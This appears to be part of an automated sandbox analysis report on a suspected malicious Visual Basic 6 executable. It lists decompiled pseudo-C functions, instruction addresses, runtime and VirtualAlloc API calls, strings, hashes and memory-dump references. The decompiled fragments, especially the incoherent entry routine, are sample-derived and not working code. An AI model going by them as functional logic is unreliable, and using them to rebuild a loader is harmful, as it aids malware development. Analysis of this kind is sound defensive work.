				signed int _t95;
				char* _t98;
				signed int _t107;
				signed int _t111;
				char* _t116;
				signed int _t117;
				char* _t118;
				void* _t152;
				void* _t154;
				intOrPtr _t155;

				_t155 = _t154 - 0xc;
				 *[fs:0x0] = _t155;
				L004011D0();
				_v16 = _t155;
				_v12 = 0x401150;
				_v8 = 0;
				_t91 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4011d6, _t152);
				L00401308();
				L004012CC();
				L004012B4();
				L0040133E();
				L004012B4();
				L0040133E();
				L004012B4();
				_v84 = _t91;
				_v92 = 8;
				_v132 = L"tryms";
				_v140 = 8;
				_t95 =  *((intOrPtr*)( *_a4 + 0x218))(_a4,  &_v76, 0x4028b8, _t91, L"ictureBo", _t91, 0x402898, "VB.");
				asm("fclex");
				_v164 = _t95;
				if(_v164 >= 0) {
					_v180 = _v180 & 0x00000000;
				} else {
					_push(0x218);
					_push(0x402460);
					_push(_a4);
					_push(_v164);
					L00401326();
					_v180 = _t95;
				}
				_push(0x10);
				L004011D0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(0x10);
				L004011D0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(2);
				_push(L"Add");
				_push(_v76);
				_t98 =  &_v108;
				_push(_t98); // executed
				L004012BA(); // executed
				_push(_t98);
				L004012C0();
				_push(_t98);
				_push( &_v32);
				L004012C6();
				_push( &_v72);
				_push( &_v68);
				_push(2);
				L00401314();
				L00401320();
				_push( &_v108);
				_push( &_v92);
				_push(2);
				L004012FC();
				if( *0x414010 != 0) {
					_v184 = 0x414010;
				} else {
					_push(0x414010);
					_push(0x402bc0);
					L0040132C();
					_v184 = 0x414010;
				}
				_t107 =  &_v76;
				L00401332();
				_v164 = _t107;
				_t111 =  *((intOrPtr*)( *_v164 + 0x1e8))(_v164,  &_v160, _t107,  *((intOrPtr*)( *((intOrPtr*)( *_v184)) + 0x2fc))( *_v184));
				asm("fclex");
				_v168 = _t111;
				if(_v168 >= 0) {
					_v188 = _v188 & 0x00000000;
				} else {
					_push(0x1e8);
					_push(0x40274c);
					_push(_v164);
					_push(_v168);
					L00401326();
					_v188 = _t111;
				}
				_v116 = _v160;
				_v124 = 2;
				_push(0x10);
				L004011D0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Left");
				_push(_v32);
				L004012AE();
				L00401320();
				_v116 = 0x1ea5;
				_v124 = 2;
				_push(0x10);
				L004011D0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Top");
				_push(_v32);
				L004012AE();
				_v116 = _v116 | 0xffffffff;
				_v124 = 0xb;
				_push(0x10);
				L004011D0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Visible");
				_push(_v32);
				L004012AE();
				_v116 = _v116 | 0xffffffff;
				_v124 = 0x800b;
				_push(0);
				_push(L"Enabled");
				_push(_v32);
				_t116 =  &_v92;
				_push(_t116);
				L004012BA();
				_push(_t116);
				_t117 =  &_v124;
				_push(_t117);
				L004012A8();
				_v164 = _t117;
				L0040131A();
				_t118 = _v164;
				if(_t118 != 0) {
					_push(0x40290c);
					_push(0x40290c);
					L004012A2();
					if(_t118 == 0) {
						_t118 =  &_v92;
						_push(_t118);
						L00401296();
						L0040129C();
					}
				}
				_push(0x412381);
				L00401302();
				L00401320();
				L0040131A();
				L0040131A();
				return _t118;
			}

0x0041201c
0x0041202b
0x00412037
0x0041203f
0x00412042
0x00412049
0x00412058
0x00412061
0x0041206c
0x0041207b
0x00412085
0x00412090
0x0041209a
0x004120a5
0x004120aa
0x004120ad
0x004120b4
0x004120bb
0x004120d1
0x004120d7
0x004120d9
0x004120e6
0x00412108
0x004120e8
0x004120e8
0x004120ed
0x004120f2
0x004120f5
0x004120fb
0x00412100
0x00412100
0x0041210f
0x00412112
0x0041211c
0x0041211d
0x0041211e
0x0041211f
0x00412120
0x00412123
0x00412130
0x00412131
0x00412132
0x00412133
0x00412134
0x00412136
0x0041213b
0x0041213e
0x00412141
0x00412142
0x0041214a
0x0041214b
0x00412150
0x00412154
0x00412155
0x0041215d
0x00412161
0x00412162
0x00412164
0x0041216f
0x00412177
0x0041217b
0x0041217c
0x0041217e
0x0041218d
0x004121aa
0x0041218f
0x0041218f
0x00412194
0x00412199
0x0041219e
0x0041219e
0x004121ce
0x004121d2
0x004121d7
0x004121f2
0x004121f8
0x004121fa
0x00412207
0x0041222c
0x00412209
0x00412209
0x0041220e
0x00412213
0x00412219
0x0041221f
0x00412224
0x00412224
0x0041223a
0x0041223e
0x00412245
0x00412248
0x00412252
0x00412253
0x00412254
0x00412255
0x00412256
0x0041225b
0x0041225e
0x00412266
0x0041226b
0x00412272
0x00412279
0x0041227c
0x00412286
0x00412287
0x00412288
0x00412289
0x0041228a
0x0041228f
0x00412292
0x00412297
0x0041229b
0x004122a2
0x004122a5
0x004122af
0x004122b0
0x004122b1
0x004122b2
0x004122b3
0x004122b8
0x004122bb
0x004122c0
0x004122c4
0x004122cb
0x004122cd
0x004122d2
0x004122d5
0x004122d8
0x004122d9
0x004122e1
0x004122e2
0x004122e5
0x004122e6
0x004122eb
0x004122f5
0x004122fa
0x00412303
0x00412305
0x0041230a
0x0041230f
0x00412316
0x00412318
0x0041231b
0x0041231c
0x00412327
0x00412327
0x00412316
0x0041232c
0x00412363
0x0041236b
0x00412373
0x0041237b
0x00412380

APIs

__vbaChkstk.MSVBVM60(?,004011D6), ref: 00412037
__vbaStrCopy.MSVBVM60(?,?,?,?,004011D6), ref: 00412061
__vbaVarDup.MSVBVM60(?,?,?,?,004011D6), ref: 0041206C
__vbaStrCat.MSVBVM60(00402898,VB.,?,?,?,?,004011D6), ref: 0041207B
__vbaStrMove.MSVBVM60(00402898,VB.,?,?,?,?,004011D6), ref: 00412085
__vbaStrCat.MSVBVM60(ictureBo,00000000,00402898,VB.,?,?,?,?,004011D6), ref: 00412090
__vbaStrMove.MSVBVM60(ictureBo,00000000,00402898,VB.,?,?,?,?,004011D6), ref: 0041209A
__vbaStrCat.MSVBVM60(004028B8,00000000,ictureBo,00000000,00402898,VB.,?,?,?,?,004011D6), ref: 004120A5
__vbaHresultCheckObj.MSVBVM60(00000000,00401150,00402460,00000218), ref: 004120FB
__vbaChkstk.MSVBVM60(00000000,00401150,00402460,00000218), ref: 00412112
__vbaChkstk.MSVBVM60(00000000,00401150,00402460,00000218), ref: 00412123
__vbaLateMemCallLd.MSVBVM60(?,?,Add,00000002), ref: 00412142
__vbaObjVar.MSVBVM60(00000000,?,004028B8,00000000,ictureBo,00000000,00402898,VB.,?,?,?,?,004011D6), ref: 0041214B
__vbaObjSetAddref.MSVBVM60(?,00000000,00000000,?,004028B8,00000000,ictureBo,00000000,00402898,VB.,?,?,?,?,004011D6), ref: 00412155
__vbaFreeStrList.MSVBVM60(00000002,00000000,00000000,?,00000000,00000000,?,004028B8,00000000,ictureBo,00000000,00402898,VB.), ref: 00412164
__vbaFreeObj.MSVBVM60(?,00000000,00000000,?,004028B8,00000000,ictureBo,00000000,00402898,VB.,?,?,?,?,004011D6), ref: 0041216F
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,00000000,00000000,?,004028B8,00000000,ictureBo,00000000,00402898,VB.), ref: 0041217E
__vbaNew2.MSVBVM60(00402BC0,00414010,?,?,?,?,00000000,00000000,?,004028B8,00000000,ictureBo,00000000,00402898,VB.), ref: 00412199
__vbaObjSet.MSVBVM60(?,00000000), ref: 004121D2
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040274C,000001E8), ref: 0041221F
__vbaChkstk.MSVBVM60(00000000,?,0040274C,000001E8), ref: 00412248
__vbaLateMemSt.MSVBVM60(?,Left), ref: 0041225E
__vbaFreeObj.MSVBVM60(?,Left), ref: 00412266
__vbaChkstk.MSVBVM60(?,Left), ref: 0041227C
__vbaLateMemSt.MSVBVM60(?,Top,?,Left), ref: 00412292
__vbaChkstk.MSVBVM60(?,Top,?,Left), ref: 004122A5
__vbaLateMemSt.MSVBVM60(?,Visible,?,Top,?,Left), ref: 004122BB
__vbaLateMemCallLd.MSVBVM60(?,?,Enabled,00000000,?,Visible,?,Top,?,Left), ref: 004122D9
__vbaVarTstEq.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,00000000,00000000,?,004028B8,00000000,ictureBo), ref: 004122E6
__vbaFreeVar.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,00000000,00000000,?,004028B8,00000000,ictureBo), ref: 004122F5
__vbaStrCmp.MSVBVM60(0040290C,0040290C,?,00000000,?,?,?,?,?,?,?,?,00000000,00000000,?,004028B8), ref: 0041230F
#546.MSVBVM60(?,0040290C,0040290C,?,00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0041231C
__vbaVarMove.MSVBVM60(?,0040290C,0040290C,?,00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00412327
__vbaFreeStr.MSVBVM60(00412381,?,00000000,?,?,?,?,?,?,?,?,00000000,00000000,?,004028B8,00000000), ref: 00412363
__vbaFreeObj.MSVBVM60(00412381,?,00000000,?,?,?,?,?,?,?,?,00000000,00000000,?,004028B8,00000000), ref: 0041236B
__vbaFreeVar.MSVBVM60(00412381,?,00000000,?,?,?,?,?,?,?,?,00000000,00000000,?,004028B8,00000000), ref: 00412373
__vbaFreeVar.MSVBVM60(00412381,?,00000000,?,?,?,?,?,?,?,?,00000000,00000000,?,004028B8,00000000), ref: 0041237B

Strings

Enabled, xrefs: 004122CD
Add, xrefs: 00412136
Top, xrefs: 0041228A
Visible, xrefs: 004122B3
ictureBo, xrefs: 0041208B
Left, xrefs: 00412256
tryms, xrefs: 004120B4
VB., xrefs: 00412071

Memory Dump Source

Source File: 00000000.00000002.1737108122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1737093572.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1737190061.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1737310362.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Chkstk$Late$Move$CallCheckHresultList$#546AddrefCopyNew2
String ID: Add$Enabled$Left$Top$VB.$Visible$ictureBo$tryms
API String ID: 2967171306-456402393
Opcode ID: db43bb45841aa93c57aba0934f51cce61e72da8d8225d03680ddc741f8b064e7
Instruction ID: 582e7023d8c3c61dd6d78bd5ef0e242a6e40172fcefe469dbe3c3981d48f2a83
Opcode Fuzzy Hash: db43bb45841aa93c57aba0934f51cce61e72da8d8225d03680ddc741f8b064e7
Instruction Fuzzy Hash: 6B916071D00208ABDB10EFA1CC46BDEBB75BF04704F5041AAF904BB1E2DBB85A85CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0041293B, Relevance: 7.5, APIs: 5, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0041293B(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				intOrPtr _v32;
				char _v40;
				char* _t11;
				intOrPtr _t22;

				_push(0x4011d6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t22;
				_push(0x28);
				L004011D0();
				_v12 = _t22;
				_v8 = 0x401198;
				_v32 = 0x17;
				_v40 = 2;
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xffffffff);
				_t11 =  &_v40;
				_push(_t11); // executed
				L00401284(); // executed
				L0040133E();
				L0040131A();
				_push(0x4129b2);
				L00401302();
				return _t11;
			}

0x00412940
0x0041294b
0x0041294c
0x00412953
0x00412956
0x0041295e
0x00412961
0x00412968
0x0041296f
0x00412976
0x00412978
0x0041297a
0x0041297c
0x0041297e
0x00412981
0x00412982
0x0041298c
0x00412994
0x00412999
0x004129ac
0x004129b1

APIs

__vbaChkstk.MSVBVM60(?,004011D6), ref: 00412956
#702.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,004011D6), ref: 00412982
__vbaStrMove.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,004011D6), ref: 0041298C
__vbaFreeVar.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,004011D6), ref: 00412994
__vbaFreeStr.MSVBVM60(004129B2,00000002,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,004011D6), ref: 004129AC

Memory Dump Source

Source File: 00000000.00000002.1737108122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1737093572.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1737190061.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1737310362.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#702ChkstkMove
String ID:
API String ID: 3665094559-0
Opcode ID: 480d53740c98d55ad08a5d794021da8847be0116cf210cd58b9a1d9be16cfd0f
Instruction ID: fe17d6d99096b9be0f8a81b986e05677a67d91aa006c5d046eea87b08ac25603
Opcode Fuzzy Hash: 480d53740c98d55ad08a5d794021da8847be0116cf210cd58b9a1d9be16cfd0f
Instruction Fuzzy Hash: AFF04F70904249BADB04DB96CE06FDEB7B8EB05724F70436AB021765E1DAB81E048769

Uniqueness

Uniqueness Score: -1.00%

Function 0040135C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 75%

			_entry_(signed int __eax, void* __ebx, void* __ecx, void* __edi, signed int* __esi, void* __fp0) {
				signed int _t38;
				char _t41;
				intOrPtr* _t42;
				intOrPtr* _t48;
				signed int _t49;
				signed int _t50;
				void* _t53;
				void* _t56;
				signed int _t62;
				void* _t63;
				void* _t65;
				void* _t70;

				_t70 = __fp0;
				_t57 = __esi;
				_push("VB5!6&*"); // executed
				L00401356(); // executed
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax ^ __eax;
				 *__eax =  *__eax + __eax;
				_t38 = __eax + 1;
				 *_t38 =  *_t38 + _t38;
				 *_t38 =  *_t38 + _t38;
				 *_t38 =  *_t38 + _t38;
				 *((intOrPtr*)(__ecx + 0x6a)) =  *((intOrPtr*)(__ecx + 0x6a)) + __ebx;
				_t50 = _t49;
				asm("stosd");
				asm("invalid");
				_t41 = __ebx + 1;
				asm("stosb");
				 *((char*)(_t62 + 0x2c)) = _t41;
				_t53 = __edi + 1;
				 *_t38 =  *_t38 + _t38;
				 *_t38 =  *_t38 + _t38;
				 *_t38 =  *_t38 + _t38;
				 *_t38 =  *_t38 + _t38;
				 *_t38 =  *_t38 + _t38;
				 *_t38 =  *_t38 + _t38;
				 *_t38 =  *_t38 + _t38;
				 *_t38 =  *_t38 + _t38;
				asm("popad");
				if( *_t38 != 0) {
					 *_t38 =  *_t38 + _t38;
					 *_t38 =  *_t38 + _t38;
					 *_t38 =  *_t38 + _t38;
					 *0xf400000a =  *0xf400000a + _t41;
					_t39 = _t38 + 0xd000000;
					 *((intOrPtr*)(__ecx + 0x52)) =  *((intOrPtr*)(__ecx + 0x52)) + _t39;
					_push(_t41);
					_push(_t63);
					_t56 = _t53 + 1;
					_t42 = _t41 + 1;
					_t48 = __ecx + 1;
					_t65 = _t63;
					 *0x42001701 =  *0x42001701 + _t48;
					__eflags =  *0x42001701;
					if(__eflags < 0) {
						L16:
						 *_t39 = _t39 +  *_t39;
						 *_t39 = _t39 +  *_t39;
						_t14 = _t56 - 0x66;
						 *_t14 =  *(_t56 - 0x66) + _t50;
						__eflags =  *_t14;
					} else {
						if(__eflags >= 0) {
							if(__eflags != 0) {
								goto L8;
							} else {
								_t50 = 0;
								if(__eflags < 0) {
									goto L9;
								}
							}
						} else {
							asm("popad");
							asm("bound esi, [ebx+0x70]");
							if(__eflags >= 0) {
								asm("popad");
								asm("outsb");
								asm("insb");
								L8:
								asm("a16 outsb");
								_t62 = _t57[0x19] * 0x317265;
								__eflags = _t62;
								L9:
								asm("outsb");
								asm("a16 jb 0x35");
								 *_t48 =  *_t48 + _t42;
								 *_t39 = _t39 +  *_t39;
								_t50 = _t50 + 1;
								 *_t50 =  *_t50 + _t39;
								 *_t42 =  *_t42 + _t65;
								_t7 = _t39;
								_t39 =  *0x746c0000;
								 *0x746c0000 = _t7;
								 *_t39 = _t39 +  *_t39;
								__eflags =  *_t39;
								_t8 =  &(_t57[1]);
								 *_t8 = _t57[1] + _t42;
								__eflags =  *_t8;
							}
						}
					}
					_t39 = 0xcba36600;
					_t16 = _t50 - 0x59;
					 *_t16 =  *(_t50 - 0x59) + _t48;
					__eflags =  *_t16;
					asm("rol dword [eax], cl");
					_push(0xffffffa8);
					asm("rol dword [eax], cl");
					_push(0x6700d5a8);
					asm("lodsb");
					_push(0xffffffab);
					_t70 = _t70 +  *0xcba36600 +  *0xcba36600;
					if(__eflags >= 0) {
						 *_t39 = _t39 +  *_t39;
						asm("adc [eax], al");
						 *_t39 = _t39 +  *_t39;
						__eflags =  *_t39;
						 *_t39 = _t39 +  *_t39;
						 *_t39 = _t39 +  *_t39;
						 *_t48 =  *_t48 + _t39;
						 *_t39 =  *_t39 + _t48;
						 *_t39 = _t39 +  *_t39;
						 *_t39 = _t39 +  *_t39;
						_t39[0] = _t39 + _t39[0];
						 *_t39 = _t39 +  *_t39;
						 *_t39 = _t39 +  *_t39;
						 *_t39 = _t39 +  *_t39;
						 *_t39 = _t39 +  *_t39;
						 *_t39 = _t39 +  *_t39;
						 *_t48 =  *_t48 + _t39;
						 *_t39 = _t39 +  *_t39;
						__eflags =  *_t39;
						 *_t39 = _t39 +  *_t39;
						 *_t39 = _t39 +  *_t39;
						__eflags =  *_t39;
						goto L16;
					}
					asm("aad 0x0");
					if (__eflags < 0) goto L14;
					_t48 = 0xda;
				} else {
					_push(0x61696e65);
					 *_t38 =  *_t38 + _t38;
					 *_t38 =  *_t38 + _t38;
					 *_t38 =  *_t38 + _t38;
					 *_t38 =  *_t38 + _t38;
					 *_t38 =  *_t38 + _t38;
					 *_t38 =  *_t38 + _t38;
					 *_t38 =  *_t38 ^ _t38;
					 *__esi =  *__esi & _t50;
					asm("adc ebx, [0xe691a10]");
					asm("aad 0x5");
					return;
				}
			}

0x0040135c
0x0040135c
0x0040135c
0x00401361
0x00401366
0x00401368
0x0040136a
0x0040136c
0x0040136e
0x00401370
0x00401371
0x00401373
0x00401375
0x00401377
0x0040137a
0x0040137c
0x0040137d
0x0040137f
0x00401380
0x00401381
0x00401384
0x00401388
0x0040138a
0x0040138c
0x0040138e
0x00401390
0x00401392
0x00401394
0x00401396
0x00401398
0x00401399
0x004013fe
0x00401400
0x00401402
0x00401404
0x0040140a
0x0040140f
0x00401413
0x00401414
0x00401418
0x0040141a
0x0040141b
0x0040141c
0x0040141d
0x0040141d
0x00401423
0x0040148b
0x0040148b
0x0040148d
0x0040148f
0x0040148f
0x0040148f
0x00401426
0x00401426
0x00401494
0x00000000
0x00401496
0x00401496
0x00401498
0x00000000
0x00000000
0x00401498
0x00401429
0x00401429
0x0040142a
0x0040142c
0x0040142e
0x0040142f
0x00401430
0x00401431
0x00401431
0x00401433
0x00401433
0x00401434
0x00401434
0x00401435
0x00401439
0x0040143b
0x0040143d
0x0040143e
0x00401440
0x00401442
0x00401442
0x00401442
0x00401448
0x00401448
0x00401449
0x00401449
0x00401449
0x00401449
0x0040142c
0x00401426
0x0040149a
0x0040149f
0x0040149f
0x0040149f
0x004014a2
0x004014a4
0x004014a6
0x004014a8
0x004014ad
0x004014b0
0x004014b2
0x004014b4
0x00401466
0x00401468
0x0040146a
0x0040146a
0x0040146b
0x0040146d
0x0040146f
0x00401471
0x00401473
0x00401475
0x00401477
0x0040147a
0x0040147c
0x0040147e
0x00401480
0x00401482
0x00401484
0x00401486
0x00401486
0x00401487
0x00401489
0x00401489
0x00000000
0x00401489
0x004014b6
0x004014b8
0x004014b9
0x0040139b
0x0040139b
0x004013a0
0x004013a2
0x004013a4
0x004013a6
0x004013a8
0x004013aa
0x004013ae
0x004013b0
0x004013b2
0x004013bb
0x004013bd
0x004013bd

APIs

#100.MSVBVM60(VB5!6&*), ref: 00401361

Strings

VB5!6&*, xrefs: 0040135C

Memory Dump Source

Source File: 00000000.00000002.1737108122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1737093572.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1737190061.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1737310362.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: 0f0b4d5d3aded4402b6797ca74b29a580ff08f960463fc65c82b2d6fea20bb32
Instruction ID: a2dac2a75ab24d75fd570d34455b4b8089828afabbc1ed063f707e8945e4b777
Opcode Fuzzy Hash: 0f0b4d5d3aded4402b6797ca74b29a580ff08f960463fc65c82b2d6fea20bb32
Instruction Fuzzy Hash: A5D0A49A98E3C00EE30322B588625897F308823A6836B00EBC4D1DB4F3C16D080AC36B

Uniqueness

Uniqueness Score: -1.00%

Function 00406831, Relevance: 1.7, APIs: 1, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1737108122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1737093572.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1737190061.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1737310362.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19e57f82b94c064105672cd17e6ac326c62428235aeed63fe1481f9298e84129
Instruction ID: 17681b1d1036616272fb1ccc0a6b25cd23e45a4336e8ae6d480e86f9e4259f91
Opcode Fuzzy Hash: 19e57f82b94c064105672cd17e6ac326c62428235aeed63fe1481f9298e84129
Instruction Fuzzy Hash: 6F5146E2E2E302D9EA18695168840F4224CA61F375273B83BC50FB68C7453C7277B66F

Uniqueness

Uniqueness Score: -1.00%

Function 00406C95, Relevance: 1.6, APIs: 1, Instructions: 331memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00406D2C

Memory Dump Source

Source File: 00000000.00000002.1737108122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1737093572.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1737190061.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1737310362.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 79af1a063b8e3f40fcce2d59e5d04196edb6d675bea4e4237728a5d0c919b11b
Instruction ID: fc75df925d5136b268aaf9868b4e8a37db313949407b16dd3c5d2cca3cd9abe5
Opcode Fuzzy Hash: 79af1a063b8e3f40fcce2d59e5d04196edb6d675bea4e4237728a5d0c919b11b
Instruction Fuzzy Hash: E151F5A1F1D296D6F27C255489401BAA50CED0FBA223B6837880F7A6CA443D7D33744F

Uniqueness

Uniqueness Score: -1.00%

Function 00406913, Relevance: 1.6, APIs: 1, Instructions: 314memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00406D2C

Memory Dump Source

Source File: 00000000.00000002.1737108122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1737093572.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1737190061.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1737310362.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 38fc2432a010c3bb3a710301d09a0dc79304ce2252fc836e074e1a9fd0b420ff
Instruction ID: e7067e95482dcbae76dc1f0e1ba8985d9dc22294bf30bc68732fb6b37466defd
Opcode Fuzzy Hash: 38fc2432a010c3bb3a710301d09a0dc79304ce2252fc836e074e1a9fd0b420ff
Instruction Fuzzy Hash: AC5176E1E2E303C9E61C695688881F9614DA60F758233793B854FB79D6843D7233B4AF

Uniqueness

Uniqueness Score: -1.00%

Function 00406944, Relevance: 1.5, APIs: 1, Instructions: 274memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00406D2C

Memory Dump Source

Source File: 00000000.00000002.1737108122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1737093572.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1737190061.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1737310362.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 4e5b39c3591ae1c5e8f9b5b0f89b609cd93e74580be27c14cbdd5139031d3b24
Instruction ID: b16b0d86cb6274357117ade74dcdf7de24b7db67680182d8831da67f5ebb3758
Opcode Fuzzy Hash: 4e5b39c3591ae1c5e8f9b5b0f89b609cd93e74580be27c14cbdd5139031d3b24
Instruction Fuzzy Hash: D34195E1E2E307D9E668696088804F8244DE60F794232BD77890F378C7943D7227B55F

Uniqueness

Uniqueness Score: -1.00%

Function 00406AA0, Relevance: 1.5, APIs: 1, Instructions: 252memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00406D2C

Memory Dump Source

Source File: 00000000.00000002.1737108122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1737093572.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1737190061.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1737310362.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 70e19ffba8bdd31bcb65cf6fd0003cf24b552c9de960cc42a1e6ca25088d344c
Instruction ID: 48e72f97c111375b45d0e79e5c30e7804687507bdf5ee690803c220e524af14f
Opcode Fuzzy Hash: 70e19ffba8bdd31bcb65cf6fd0003cf24b552c9de960cc42a1e6ca25088d344c
Instruction Fuzzy Hash: 973132E1E6E317E9E2685A5098804F9640CE60F754132BD7B8A4F374C7447D3627B4AF

Uniqueness

Uniqueness Score: -1.00%

Function 00406AF9, Relevance: 1.5, APIs: 1, Instructions: 229memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00406D2C

Memory Dump Source

Source File: 00000000.00000002.1737108122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1737093572.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1737190061.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1737310362.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 8fee22c48995f9f2472c7c6192af1b5f1eae07b78911d3edb05a60f0cc83abb6
Instruction ID: bdf7a824f306e2084d5fa24b9fa929127c40f0e6c1386834d3774ebf8d078eff
Opcode Fuzzy Hash: 8fee22c48995f9f2472c7c6192af1b5f1eae07b78911d3edb05a60f0cc83abb6
Instruction Fuzzy Hash: 423154E1E6E317D9E2284A6098804F9240CEA0F754232BD7B894F374C3447D3627B0AF

Uniqueness

Uniqueness Score: -1.00%

Function 00406BB0, Relevance: 1.5, APIs: 1, Instructions: 227memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00406D2C

Memory Dump Source

Source File: 00000000.00000002.1737108122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1737093572.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1737190061.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1737310362.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: be726d9cdba93bc9b6ff9a921b0bf3ff9cf587f165b20e9310087927c2acf5de
Instruction ID: e0aed5e3feec6d0a975489f9bd47acdd3c5b6d9be25dec88d33afa8012d10305
Opcode Fuzzy Hash: be726d9cdba93bc9b6ff9a921b0bf3ff9cf587f165b20e9310087927c2acf5de
Instruction Fuzzy Hash: A23145A1E2E307D9E26C496498805F9644CA60F764232BE7B890F375C3947D3627B0AF

Uniqueness

Uniqueness Score: -1.00%

Function 004069DA, Relevance: 1.5, APIs: 1, Instructions: 226memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00406D2C

Memory Dump Source

Source File: 00000000.00000002.1737108122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1737093572.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1737190061.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1737310362.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 525828eea66db7c3e3d76e1b4778fad53527cb7a14aed12c330f53b598fb0930
Instruction ID: 760b5086f7f45ad55db244fc212e276d50dab4d9448a39e7cd6dba0bfdf8d462
Opcode Fuzzy Hash: 525828eea66db7c3e3d76e1b4778fad53527cb7a14aed12c330f53b598fb0930
